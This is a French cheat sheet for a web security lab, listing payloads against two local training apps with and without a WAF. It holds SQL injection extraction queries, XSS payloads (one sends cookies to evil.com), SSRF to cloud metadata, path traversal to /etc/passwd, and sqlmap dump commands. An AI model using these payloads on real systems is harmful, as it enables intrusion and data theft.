╔══════════════════════════════════════════════════════════════════════════╗
║                    CHEATSHEET PAYLOADS — TP SÉCURITÉ WEB               ║
╚══════════════════════════════════════════════════════════════════════════╝

┌─────────────────────────────────────────────────────────────────────────┐
│ PORTS                                                                   │
│  :3000 → TechMart SANS WAF       :80   → TechMart AVEC WAF             │
│  :5000 → SecureBlog SANS WAF     :8080 → SecureBlog AVEC WAF           │
└─────────────────────────────────────────────────────────────────────────┘

━━━━━━━━━━━━━━━━━━━━━━ 🔴 SQLi ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[LOGIN BYPASS]
  URL  : http://localhost:3000/login  ou  http://localhost:5000/login
  User : admin' --
  User : ' OR '1'='1' --
  Pass : (n'importe quoi)

[UNION - TechMart 13 colonnes]
  URL : http://localhost:3000/products?q=PAYLOAD

  → Extraire utilisateurs :
    %' UNION SELECT 1,username,password,4,5,6,7,8,9,10,11,12,13 FROM users --

  → Extraire secrets (clés API, flags) :
    %' UNION SELECT 1,label,value,4,5,6,7,8,9,10,11,12,13 FROM secret_data --

  → Lister les tables :
    %' UNION SELECT 1,name,sql,4,5,6,7,8,9,10,11,12,13 FROM sqlite_master WHERE type='table' --

[UNION - SecureBlog 4 colonnes]
  URL : http://localhost:5000/search?q=PAYLOAD

  → Utilisateurs :  %' UNION SELECT 1,username,password,role FROM users --
  → Secrets :       %' UNION SELECT 1,info,3,4 FROM secret_data --

━━━━━━━━━━━━━━━━━━━━━ 🟣 XSS ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[XSS RÉFLÉCHI]
  URL : /products?q=  ou  /search?q=

  <script>alert(document.cookie)</script>
  <img src=x onerror=alert(document.cookie)>
  <svg onload=alert(1)>
  <body onload=alert(1)>

[XSS STOCKÉ]
  URL : /product/1 → avis  ou  /post/1 → commentaires

  <script>alert('XSS Stocké !')</script>
  <img src=x onerror="alert('Cookie: '+document.cookie)">
  <script>new Image().src='http://evil.com/?c='+document.cookie</script>
  <script>document.body.innerHTML='<h1>HACKED</h1>'</script>

[XSS DOM]
  /profile?name=<img src=x onerror=alert(1)>
  /profile?name=<svg/onload=alert(document.cookie)>

━━━━━━━━━━━━━━━━━━━━━ 🟠 Node.js Exclusif ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[PROTOTYPE POLLUTION]
  URL : POST http://localhost:3000/profile/update
  Body: data={"__proto__":{"isAdmin":true,"role":"admin"}}

  Test résultat dans la page : isAdmin=true signifie pollution réussie

[ReDoS]
  URL : http://localhost:3000/coupon
  Code: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
        (50+ 'A' suivi d'un '!' — mesurer le temps de réponse)

[SSRF]
  URL : POST http://localhost:3000/order/1/track
  Body: webhook_url=http://app:5000/
        webhook_url=http://localhost:3000/admin
        webhook_url=http://169.254.169.254/latest/meta-data/

[PATH TRAVERSAL]
  http://localhost:3000/download/file?file=../../etc/passwd
  http://localhost:3000/download/file?file=../../etc/hostname
  http://localhost:3000/download/file?file=../app.js
  http://localhost:3000/download/file?file=../files/.env.production

━━━━━━━━━━━━━━━━━━━━━ 🔧 CURL TESTS ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

# SQLi Login
curl -X POST http://localhost:3000/login \
  -d "username=admin' --&password=x" -L -c /tmp/cookies.txt

# XSS Réfléchi
curl "http://localhost:3000/products?q=<script>alert(1)</script>" -v

# Test WAF (doit renvoyer 403 si WAF en mode On)
curl -s -o /dev/null -w "HTTP %{http_code}\n" \
  "http://localhost/products?q=%27+UNION+SELECT+1,2--"

# SQLMAP automatique
sqlmap -u "http://localhost:3000/products?q=test" \
  --level=3 --risk=2 --batch --dump

━━━━━━━━━━━━━━━━━━━━━ 📋 COMPTES ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

TechMart  : admin/Admin@TechMart2024 | alice/alice123 | bob/bob456
SecureBlog: admin/Admin@1234         | alice/alice123 | bob/bob456

━━━━━━━━━━━━━━━━━━━━━ 🛡️ ACTIVER LE WAF ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Dans docker-compose.yml → Changer pour waf ET waf-flask :
  MODSECURITY_SEC_RULE_ENGINE: "On"    # était "DetectionOnly"

Puis : docker compose up -d waf waf-flask

Logs WAF : docker compose logs -f waf
